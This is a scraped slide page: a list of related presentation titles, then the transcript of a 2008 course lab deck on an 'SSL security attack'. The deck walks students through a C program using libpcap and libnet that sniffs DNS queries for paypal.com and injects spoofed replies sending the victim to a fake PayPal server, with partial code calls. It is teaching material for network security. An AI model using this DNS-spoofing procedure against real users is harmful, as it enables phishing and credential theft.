Lab 2: SSL Security Attack June 17, 2008 Hyun Jin Kim.

Slides:

Advertisements

Similar presentations

Florida State UniversityCOP Advanced Unix Programming Raw Sockets Datalink Access Chapters 25, 26.

Advertisements

Router Implementation Project-2

Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006.

Sergei Komarov. DNS  Mechanism for IP hostname resolution  Globally distributed database  Hierarchical structure  Comprised of three components.

Module 7: Configuring Access to Internal Resources.

Hands-On Ethical Hacking and Network Defense Lecture 15 Man in the Middle Attack to get Passwords from HTTPS Sessions.

DHCP Dynamic Host Configuration Part 7 NVCC Professional Development TCP/IP.

Module 5: Configuring Access to Internal Resources.

Lab 4: Simple Router CS144 Lab 4 Screencast May 2, 2008 Ben Nham Based on slides by Clay Collier and Martin Casado.

Internet Control Message Protocol (ICMP). Introduction The Internet Protocol (IP) is used for host-to-host datagram service in a system of interconnected.

UDP - User Datagram Protocol UDP – User Datagram Protocol Author : Nir Shafrir Reference The TCP/IP Guide - ( Version Version.

1 Network Address Translation (NAT) Relates to Lab 7. Module about private networks and NAT.

Leon-Garcia & Widjaja: Communication Networks Copyright ©2000 The McGraw Hill Companies The user clicks on a link to indicate which document is to be retrieved.

Securing TCP/IP Chapter 6. Introduction to Transmission Control Protocol/Internet Protocol (TCP/IP) TCP/IP comprises a suite of four protocols The protocols.

Chapter 2 Networking Overview. Figure 2.1 Generic protocol layers move data between systems.

COEN 445 Communication Networks and Protocols Lab 3

Lecture 8 Modeling & Simulation of Communication Networks.

1 Enabling Secure Internet Access with ISA Server.

1 Advanced Application and Web Filtering. 2 Common security attacks Finding a way into the network Exploiting software bugs, buffer overflows Denial of.

OSI Model Routing Connection-oriented/Connectionless Network Services.

Cisco Discovery Working at a Small-to-Medium Business or ISP CHAPTER 7 ISP Services Jr.

CSCD433 Advanced Networks Fall 2011 Raw vs. Cooked Sockets.

Exercises ARP ICMP DNS HTTP/TCP Trace analysis. ARP launch Wireshark ipconfig /all ; see local IP and gateway route -print ; find gateway arp -a ; list.

PA3: Router Junxian (Jim) Huang EECS 489 W11 /

Implementing ISA Server Publishing. Introduction What Are Web Publishing Rules? ISA Server uses Web publishing rules to make Web sites on protected networks.

Chapter 13 – Network Security

Enabling Embedded Systems to access Internet Resources.

This courseware is copyrighted © 2015 gtslearning. No part of this courseware or any training material supplied by gtslearning International Limited to.

TCP/IP Networking Review Covered Subjects:  Packet Switched Network Structure  Issues of PSNs  Ports & IP Numbers  Delivery Services  Domain Name.

A day in the life: scenario

The complete picture Linux Network Management. End to End Connection Being able to describe the end to end connection sequence is a useful thing Very.

1 IP: putting it all together Part 1 G53ACC Chris Greenhalgh.

Internet Ethernet Token Ring Video High Speed Router Host A: Client browser: REQUEST:http//mango.ee.nogradesu.edu/c461.

Transmission Control Protocol TCP. Transport layer function.

Raw Sockets Vivek Ramachandran. A day in the life of Network Packet.

The Inter-network is a big network of networks.. The five-layer networking model for the internet.

Linux Networking and Security

Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.

Application Block Diagram III. SOFTWARE PLATFORM Figure above shows a network protocol stack for a computer that connects to an Ethernet network and.

Verify that timestamps for debugging and logging messages has been enabled. Verify the severity level of events that are being captured. Verify that the.

Security, NATs and Firewalls Ingate Systems. Basics of SIP Security.

DoS Suite and Raw Socket Programming Group 16 Thomas Losier Paul Obame Group 16 Thomas Losier Paul Obame.

Denial of Service Datakom Ht08 Jesper Christensen, Patrick Johansson, Robert Kajic A short introduction to DoS.

Practice 4 – traffic filtering, traffic analysis

Sniffer, tcpdump, Ethereal, ntop

0x440 Network Sniffing.

PLUS 내부 세미나 1/22 The Libnet Library 이병영 2004/05/06.

Firewalls A brief introduction to firewalls. What does a Firewall do? Firewalls are essential tools in managing and controlling network traffic Firewalls.

ARP ‘n RARP. The Address Resolution Protocol (ARP) is a request sent out by a computer to find another computer’s MAC address. It already knows the IP.

WIRESHARK Lab#3. Computer Network Monitoring  Port Scanning  Keystroke Monitoring  Packet sniffers  takes advantage of “friendly” nature of net. 

Java’s networking capabilities are declared by the classes and interfaces of package java.net, through which Java offers stream-based communications that.

End-host IP: MAC: 11:11:11:11:11 gateway IP: MAC: 22:22:22:22:22 Google server IP: interne t interface DNS server IP:

1 K. Salah Application Layer Module K. Salah Network layer duties.

Mobile Packet Sniffer Ofer Borosh Vadim Lanzman Dr. Chen Avin

Communication protocols 2. HTTP Hypertext Transfer Protocol, is the protocol of World Wide Web (www) Client web browser Web server Request files Respond.

أمن المعلومات لـ أ. عبدالرحمن محجوب حمد mtc.edu.sd أمن المعلومات Information Security أمن المعلومات Information Security  أ. عبدالرحمن محجوب  Lec (5)

IPSec Detailed Description and VPN

Module 3: Enabling Access to Internet Resources

Wireshark Lab#3.

Setting Up Firewall using Netfilter and Iptables

What does this packet do?

User Datagram Protocol (UDP)

Starting TCP Connection – A High Level View

Firewalls Chapter 8.

46 to 1500 bytes TYPE CODE CHECKSUM IDENTIFIER SEQUENCE NUMBER OPTIONAL DATA ICMP Echo message.

Computer Networks Protocols

Q/ Compare between HTTP & HTTPS? HTTP HTTPS

Packet Sniffing and Spoofing

Virtual Private Network

Presentation transcript:

Lab 2: SSL Security Attack June 17, 2008 Hyun Jin Kim

Objective Configure DNS such that gets resolved to our own IP address of the “attack” server – Paypal uses SSL protocol.

Normal DNS Query Processing DNS Server Paypal’s Server

Attacking DNS Request DNS Server Paypal Server Fake Paypal Server Filter

What We Will Do Write a program that injects a spoofed DNS Response when the source queries the IP address of C programming Basic skeleton of codes are provided. Attacker’s fake server is also provided.

Libraries Libpcap – To capture DNS requests – /usr/include/pcap.h Libnet – To inject fake DNS replies – /usr/include/libnet.h

Procedures Setup for packet sniffing Grab packets Check if packets are DNS queries If the query is for inject a spoofed DNS response backwww.paypal.com Web browser will direct to attacker’s fake paypal website!

Step 1: Packet Sniffing Setup Find the network interface for sniffing – device = pcap_lookupdev(errbuf); eth0 in our case Set up for sniffing – capdev = set_cap_dev(device, filter); filter specifies some properties of DNS Requests – UDP packets – Destination port = 53

Step 2: Grab a DNS Query Packet Grab a packet (first fill-in)‏ – packet = (u_char *) pcap_next(capdev, &pcap_hdr); Check if the packet is a DNS Query – i.e., Destination port = 53? Check if the DNS Query is for

Step 3: Create Spoofed DNS Response Create a new DNS Response with Attacker’s IP address Send it back to the source void spoof_dns(char *device)‏ – Open a raw socket – Start creating the header for the spoofed response

Step 3: Create Spoofed DNS Response Header Construction – Build DNS Header (fill in)‏ – dns = libnet_build_dnsv4(LIBNET_DNS_H, /* header size */ ntohs(spoofpacket.dns_id), /* dns id */ 0x8100, /* control flags (QR,AA,RD,*/ 1, /* number of questions */ 1, /* number of answer RR's */ 0, /* number of authority RR's*/ 0, /* number of additional RR's*/ spoofpacket.payload, /* payload */ spoofpacket.payload_size, /* payload length */ handler, /* libnet handler */ 0); /* ptag */ – Build UDP Header – Build IP Header – Calculate Checksum (fill in)‏ libnet_toggle_checksum(handler, udp, 1); libnet_toggle_checksum(handler, ip, 1);

Step 4: Inject DNS Response Inject the packet (fill in)‏ – inject_size = libnet_write(handler); Destroy the packet (fill in)‏ – libnet_destroy (handler);

Test Compile – Type make Run – Type./sslattack Open a web browser Type – No attack Type – Certificate Warning Sign

Certificate

Spoofed paypal.com

Actual paypal.com